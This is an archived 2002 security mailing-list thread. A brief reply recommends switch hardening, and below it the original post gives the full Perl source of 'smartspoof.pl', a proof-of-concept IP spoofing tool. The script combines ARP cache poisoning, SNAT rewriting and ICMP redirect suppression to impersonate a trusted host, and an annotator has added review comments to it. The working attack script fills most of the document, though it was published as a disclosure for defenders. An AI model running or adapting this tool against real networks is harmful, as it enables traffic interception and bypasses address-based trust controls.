RE: Exploit code for IP Smart Spoofing

From: Stephen Gill (gillsrat_private)
Date: Wed Nov 13 2002 - 11:32:56 PST


    In order to mitigate this on edge switches it may behoove the network
    administrator to review his or her security policy and adhere to
    stricter guidelines.  The following document suggests one method for
    protecting Cisco switches along with additional guidelines for secure
    configuration in a template format.
    
    http://www.qorbit.net/documents/catalyst-secure-template.pdf
    http://www.qorbit.net/documents/catalyst-secure-template.htm
    
    Comments or suggestions welcome.
    -- steve
    
    -----Original Message-----
    From: Laurent Licour [mailto:llicourat_private] 
    Sent: Tuesday, November 12, 2002 6:21 AM
    To: 'bugtraqat_private'
    Subject: Exploit code for IP Smart Spoofing
    
    
    Hello
    
    As reported in our previous article, IP Smartspoofing
    (http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced a
    new method for IP spoofing that allows a full connection from any client
    software.
    
    The exploit code smartspoof.pl is a proof of concept (for educational
    purposes only) of the Smart Spoofing method.
    
    The additional software "arp-fillup" is necessary to achieve this:
    http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz
    
    These tools are also available on
    http://www.althes.fr/ressources/avis/smartspoofing.htm#tools
    
    
    Exploit code (Perl source):
    
    #!/usr/bin/perl -w
    #
    # smartspoof.pl
    #
    # This script is provided as proof of concept for educational purposes only
    #
    # Laurent Licour 28/10/02
    # llicourat_private
    # Althes (http://www.althes.fr)
    #
    # Start/Stop smartspoofing
    # http://www.althes.fr/ressources/avis/smartspoofing.htm
    #
    # Require linux 2.4 (tested on Redhat 7.3)
    # Require NetAddr::IP perl package (www.cpan.org)
    # Require arp-sk tool (www.arp-sk.org)
    # Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm)
    # Require iptables (www.iptables.org)
    
    use strict;
    use Getopt::Long;
    use NetAddr::IP;
    
    # Resolve the routing next hop for an IPv4 address by parsing `route -n`.
    #
    # Arguments:
    #   $ip0 - address (string) to look up
    #   $int - scalar reference; on success it receives the interface name of
    #          the chosen route (8th column of `route -n`, trailing newline
    #          removed)
    # Returns the gateway address of the most specific route containing $ip0,
    # or the address itself when that route is directly connected (gateway
    # 0.0.0.0).  Dies when no route contains the address.
    #
    # NOTE(review): the `=3D` sequences throughout this listing are
    # quoted-printable residue from the mail archive and stand for `=`.
    sub get_ip_next_hop
    {
      my ($ip0, $int) =3D @_;
      # Indirect-object syntax (`new Class ...`); NetAddr::IP->new($ip0) is the
      # clearer spelling.
      my $ip=3Dnew NetAddr::IP $ip0;
    =20
      # Two-arg pipe open on a bareword handle with no error check: if `route`
      # cannot be started the loop below simply sees EOF and the sub dies with
      # "No route".  The handle is never closed.
      open(ROUTE, "route -n |");
      # Skip the two header lines ("Kernel IP routing table" and the column
      # titles).
      <ROUTE>; <ROUTE>;
      my $gateway=3D"";
      my $masklen; my @fields; my $line; my $entry;
      while($line =3D <ROUTE>)
      {
        # Assumes the classic `route -n` column layout (Destination Gateway
        # Genmask Flags Metric Ref Use Iface); fields 0, 1, 2 and 7 are used.
        @fields =3D split / +/, $line;
        $entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]);
        if ($entry->contains($ip))
        {
          # Longest-prefix match: take the first hit, afterwards only routes
          # with a longer mask.  $masklen is undefined until the first hit, but
          # the `or` short-circuits on $gateway eq "" so it is not compared then.
          if (($gateway eq "") or ($masklen < $entry->masklen()))
          {
            $gateway =3D $fields[1];
            $masklen =3D $entry->masklen();
            $$int =3D $fields[7];
            # Iface is the last column, so it still carries the newline.
            chop $$int;
          }
        }
      }
      die "Error : No route for $ip \n" if ($gateway eq "");
      # A 0.0.0.0 gateway means the destination is on-link; the next hop is
      # then the host itself.
      $gateway=3D$ip->addr() if ($gateway eq "0.0.0.0");
    
      return($gateway);
    }
    
    # Return the MAC address the kernel ARP cache holds for $ip.
    #
    # Sends a single ping with a 1 s deadline so the kernel populates the ARP
    # entry, then reads /proc/net/arp through a `cat | grep | awk` shell
    # pipeline and returns the 4th column with its trailing newline chopped.
    # When grep matches nothing the backticks yield "" and so does this sub.
    #
    # NOTE(review): $ip is interpolated unquoted into two shell command strings
    # and neither system() result is checked.  The grep pattern is an
    # unanchored substring match, so an address that ends in the same octets
    # (constructed example: "110.0.0.1 " also matches "10.0.0.1 ") would be
    # picked up as well.
    sub get_mac
    {
      my $ip=3Dshift;
      my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1";
      system($cmd);
      # The appended ' ' keeps e.g. 10.0.0.1 from matching 10.0.0.10.
      $cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
      my $mac=3D`$cmd`;
      chop($mac);
      return($mac);
    }
    
    # Print the help text to STDOUT and exit with status 0.
    #
    # Takes no arguments; invoked from the option handling below when -h is
    # given.  NOTE(review): several of the string literals here are split
    # across lines (e.g. "client software" / "from" / "this host"); they look
    # like mail-client line wraps, and as written the embedded newlines are
    # printed verbatim.
    sub usage
    {
      print "Start/Stop de smartspoofing\n\n";
      print "This is the proof of concept of the smartspoofing technique\n";
      print "(visit
    http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
      print "\n";
      print "You only have to specify :\n";
      print " -D : address of the filtering equipement to connect to\n";
      print " -S : address of the trusted host to spoof\n";
      print "\n";
      print "Then, you only need to launch your favorite client software
    from
    this host\n";
      print "or any host behind this (because it is now a router)\n";
      print "\n";
      print "This script is provided as proof of concept for educational
    purpose
    only.\n";
      print "\n";
    
      # Help is a terminal action: never return to the caller.
      exit 0;
    }
    
    # --- Command-line handling ------------------------------------------------
    # The usage string below carries the same mail wraps as the help text; the
    # `=` ending the "<\@=" line is a quoted-printable soft break, so the
    # intended text is "-D <@IP destination> -S <@IP source> -start|-stop".
    my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S
    <\@=
    IP
    source> -start|-stop\n";
    
    my $ver =3D "smartspoof.pl v1.0 28/10/02\n";
    
    # -D / -S take string arguments ("=s"); -i is optional and defaults to the
    # destination's outgoing interface (resolved below); -v, -h, -start and
    # -stop are flags.
    my ($ipsrc, $ipdst);
    my ($start, $stop);
    my $interface =3D "";
    my ($version, $help);
    
    Getopt::Long::GetOptions(
               "D=3Ds" =3D> \$ipdst,
    	   "S=3Ds" =3D> \$ipsrc,
    	   "i=3Ds" =3D> \$interface,
    	   "v" =3D> \$version,
    	   "h" =3D> \$help,
    	   "start" =3D> \$start,
    	   "stop" =3D> \$stop
              ) or die $syntax;
    
    
    # usage() exits 0 itself.  The version is reported via die, i.e. on STDERR
    # with a non-zero exit status.
    usage if $help;
    die $ver if $version;
    # Validation: no positional arguments may remain, both addresses are
    # mandatory, and exactly one of -start / -stop must be given.
    die $syntax unless @ARGV =3D=3D 0;
    die $syntax unless defined($ipsrc) and defined($ipdst);
    die $syntax unless defined($start) or defined($stop);
    die $syntax if $start and $stop;
    
    my $cmd;
    
    # Resolve next hop and outgoing interface for both addresses up front
    # (get_ip_next_hop dies if either has no route).  $intsrc is filled in but
    # not referenced again in this listing; $interface falls back to the
    # destination's interface when -i was not given.
    my ($intsrc, $intdst);
    my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc);
    my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst);
    $interface=3D$intdst if ($interface eq "");
    
    
    # --- Start / stop ----------------------------------------------------------
    # Every step shells out through system() with interpolated addresses and
    # interface names and never checks the return value, so a failing command
    # (missing tool, insufficient privilege to write /proc/sys or change
    # iptables) goes unnoticed because its output is redirected away.  Several
    # command strings are split across lines by the mail archive ("--=" + "to"
    # is a quoted-printable soft break for `--to`; the lone "-D" lines look
    # like mail-client wraps) and must be read as single lines.
    # NOTE(review): the reply at the head of this thread points to switch
    # hardening as the network-side mitigation for the ARP steps below.
    if ($start)
    {
      # Turn on forwarding so this host relays traffic for others.
      print "Activate IP Forwarding\n";
      system("echo 1 > /proc/sys/net/ipv4/ip_forward");
    
      # arp-fillup runs in the background (trailing &) and is only reaped by
      # the killall in the -stop branch.
      print "Activate Arp fillup on $ipsrc\n";
      system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");
    
      # POSTROUTING SNAT: packets leaving $interface for $ipdst get $ipsrc as
      # their source address.  From the defender's side this rule and the
      # OUTPUT rule below are host-level changes a ruleset audit would show.
      print "Set NAT rule on iptables\n";
      $cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT
    --=
    to
    $ipsrc";
      system($cmd);
    
      # OUTPUT rule dropping ICMP host-redirect messages sent by this host.
      print "Desactivate ICMP Redirect\n";
      system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j
    DROP");
    
      # Two arp-sk invocations: the first runs once (-c 1), the second is left
      # running in the background (trailing &) and is stopped by the killall in
      # the -stop branch.
      print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
    $ipdst_next_hop on $interface\n";
      $cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
    -D
    $ipdst_next_hop -c 1 >/dev/null 2>&1";
      system($cmd);
      $cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
    -D
    $ipdst_next_hop >/dev/null 2>&1 &";
      system($cmd);
    }
    elsif ($stop)
    {
      # killall by process name: any other arp-fillup / arp-sk instance on the
      # host is terminated too.
      print "Suppress Arp fillup on $ipsrc\n";
      system("killall arp-fillup");
    
      # Look up the genuine MAC of the source's next hop and send it once
      # (-c 1) so the entry on $ipdst_next_hop is restored.  If get_mac found
      # no ARP entry, $mac is "" and the "-S addr:" argument is malformed.
      print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
    $ipdst_next_hop\n";
      system("killall arp-sk");
      my $mac=3Dget_mac($ipsrc_next_hop);
      $cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
    $ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
      system($cmd);
    
      # Restarting the iptables service rather than deleting the two rules
      # added above; presumably any unrelated rules are reloaded from the
      # saved configuration as well -- verify on the target distribution.
      print "Clear iptables rules\n";
      system("service iptables stop");
      system("service iptables start");
    
      print "Desactivate ip forwarding\n";
      system("echo 0 > /proc/sys/net/ipv4/ip_forward");
    }
    
    
    
    
    Regards
    
    Laurent Licour
    mailto:llicourat_private
    Althes
    http://www.althes.fr
    
    =20
    
    
    
    *---------------------------------------------------------------*
    * Cet e-mail et toutes les pièces jointes sont destinés aux     *
    * seules personnes auxquelles ils sont spécifiquement adressés  *
    * et n'engagent que le signataire de ces documents et non la    *
    * structure dont il dépend.                                     *
    * Leur existence et leur contenu ont un caractère confidentiel. *
    * Toute utilisation ou diffusion non autorisée est interdite.   *
    * Si vous avez reçu cet  e-mail ou si vous détenez sans en être *
    * le destinataire, nous vous demandons de bien vouloir nous en  *
    * informer immédiatement.                                       *
    * Cette note assure que ce message a été contrôlé et ne         *
    * comprenait aucun virus connu à ce jour, néanmoins tout        *
    * message électronique est susceptible d'altération.            *
    * Nous déclinons toute responsabilité au titre de ce message    *
    * s'il a été altéré, déformé ou falsifié.                       *
    *---------------------------------------------------------------*
    


